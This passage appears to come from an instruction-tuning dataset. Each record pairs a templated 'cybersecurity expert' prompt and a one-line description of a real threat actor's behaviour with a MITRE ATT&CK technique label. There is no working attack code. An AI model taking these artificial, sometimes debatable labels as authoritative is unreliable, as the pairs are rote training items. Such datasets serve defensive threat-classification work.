sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "JSS Loader has been delivered by phishing emails containing malicious Microsoft Excel attachments.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoetRAT was distributed via malicious Word documents.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sharpshooter has sent malicious attachments via emails to targets.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Windshift has sent spearphishing emails with attachment to harvest credentials and deliver malware.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"AADInternals can send \"\"consent phishing\"\" emails containing malicious links designed to steal users\u2019 access tokens.\"", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly 2.0 used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EXOTIC LILY has relied on victims to open malicious links in e-mails for execution.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ember Bear has sent spearphishing emails containing malicious links.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sidewinder has sent e-mails with malicious links often crafted for specific targets.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.", + "output": "- T1566.003: Phishing - Spearphishing via Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.", + "output": "- T1566.003: Phishing - Spearphishing via Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 can exfiltrate data over Google Drive.", + "output": "- T1567: Exfiltration Over Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AppleSeed has exfiltrated files using web services.", + "output": "- T1567: Exfiltration Over Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DropBook has used legitimate web services to exfiltrate data.", + "output": "- T1567: Exfiltration Over Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gamaredon Group has incorporated dynamic DNS domains in its infrastructure.", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gelsemium can use dynamic DNS domain names in C2.", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2.", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete has used free dynamic DNS domains for C2.", + "output": "- T1568.001: Dynamic Resolution - Fast Flux DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.", + "output": "- T1568.001: Dynamic Resolution - Fast Flux DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CHOPSTICK can use a DGA for Fallback Channels, domains are generated by concatenating words from lists.", + "output": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT has created system services to execute cryptocurrency mining software.", + "output": "- T1569: System Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"AppleJeus has loaded a plist file using the \"\"launchctl\"\" command.\"", + "output": "- T1569.001: System Services - Launchctl" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XCSSET loads a system level launchdaemon using the \"\"launchctl load -w\"\" command from \"\"/System/Librarby/LaunchDaemons/ssh.plist\"\".\"", + "output": "- T1569.001: System Services - Launchctl" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT38 has created new services or modified existing ones to run executables, commands, or scripts.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Anchor can create and execute services to load its payload.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 has created Windows services to execute encoded PowerShell commands.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HOPLIGHT has used svchost.exe to execute a malicious DLL .", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HermeticWiper can create system services to aid in executing the payload.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Honeybee launches a DLL file that gets executed as a service using svchost.exe", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole has used Windows services as a way to execute its malicious payload.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LoudMiner started the cryptomining virtual machine as a service on the infected machine.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NotPetya can use PsExec to help propagate itself across a network.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Okrum's loader can create a new service named NtmsSvc to execute the payload.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Olympic Destroyer utilizes PsExec to help propagate itself across a network.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Proxysvc registers itself as a service on the victim\u2019s machine to run as a standalone process.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Shamoon creates a new service named \u201cntssrv\u201d to execute the payload. Shamoon can also spread via PsExec.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TinyTurla can install itself as a service on compromised machines.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WastedLocker can execute itself as a service.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices.", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kerrdown can download additional software including Cobalt Strike from servers on the victim's network.", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is 